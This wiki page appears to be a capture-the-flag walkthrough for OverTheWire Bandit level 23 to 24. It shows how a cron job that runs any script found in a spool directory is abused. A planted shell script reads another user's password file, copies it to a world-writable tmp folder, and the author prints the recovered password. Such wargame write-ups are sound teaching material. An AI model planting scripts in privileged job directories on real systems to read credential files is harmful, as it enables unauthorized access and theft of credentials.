Bandit23 - bandit24

From JaxHax
Jump to: navigation, search

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.


NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!


NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…


Solution

Another cron job level. Again, grab the details from the cron config.

bandit23@melinda:~$ ls -la
total 20
drwxr-xr-x   2 root root 4096 Nov 14 10:32 .
drwxr-xr-x 167 root root 4096 Mar 21 06:46 ..
-rw-r--r--   1 root root  220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root root 3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root root  675 Apr  9  2014 .profile
 
bandit23@melinda:~$ ls /etc/cron.d/
behemoth4_cleanup  cronjob_bandit23    manpage3_resetpw_job   natas-stats      natas27_cleanup  semtex0-64   sysstat
cron-apt           cronjob_bandit24    melinda-stats          natas25_cleanup  php5             semtex0-ppc  vortex0
cronjob_bandit22   leviathan5_cleanup  natas-session-toucher  natas26_cleanup  semtex0-32       semtex5      vortex20
 
bandit23@melinda:~$ cat /etc/cron.d/cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null


So it runs /usr/bin/cronjob_bandit24.sh every min as bandit24. Now let's see what the script does

bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24.sh 
#!/bin/bash
 
myname=$(whoami)
 
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in *;
do
    echo "Handling $i"
    ./$i
    rm -f $i
done


So this script runs all the script files in the directory /var/spool/bandit24 and deletes them. These scripts will run as bandit24 so we simply need a script that will read the password file at /etc/bandit_pass/bandit24 and dump it to the tmp directory. First let's make a globally accessible directory in the tmp folder

bandit23@melinda:~$ mkdir /tmp/minez/
 
bandit23@melinda:~$ chmod 777 /tmp/minez/


Now let's setup our script in the /var/spool/bandit24 folder

bandit23@melinda:~$ echo -e "\#\!/bin/bash\ncat /etc/bandit_pass/bandit24 > /tmp/minez/bandit24_Herp-A-Derp\nchown bandit23:bandit23 /tmp/minez/bandit24_Herp-A-Derp\n" > /var/spool/bandit24/Herp-A-Derp.sh


Basically that script is

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/minez/bandit24_Herp-A-Derp
chown bandit23:bandit23 /tmp/minez/bandit24_Herp-A-Derp


Now with that in place, we wait a minute and it should run.

bandit23@melinda:~$ ls -l /var/spool/bandit24/
total 1
-rw-rw-r-- 1 bandit23 bandit23 131 Apr  3 01:08 Herp-A-Derp.sh
 
bandit23@melinda:~$ chmod +x /var/spool/bandit24/Herp-A-Derp.sh 
 
bandit23@melinda:~$ ls -l /var/spool/bandit24/
total 1
-rwxrwxr-x 1 bandit23 bandit23 131 Apr  3 01:08 Herp-A-Derp.sh
 
bandit23@melinda:~$ ls -l /var/spool/bandit24/
total 0
 
bandit23@melinda:~$ ls -la /tmp/minez
total 1104
drwxrwxrwx   2 bandit23 bandit23    4096 Apr  3 01:09 .
drwxrwx-wt 583 root     root     1118208 Apr  3 01:09 ..
-rw-rw-r--   1 bandit24 bandit24      33 Apr  3 01:09 bandit24_Herp-A-Derp
 
bandit23@melinda:~$ cat /tmp/minez/bandit24_Herp-A-Derp  
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
 
bandit23@melinda:~$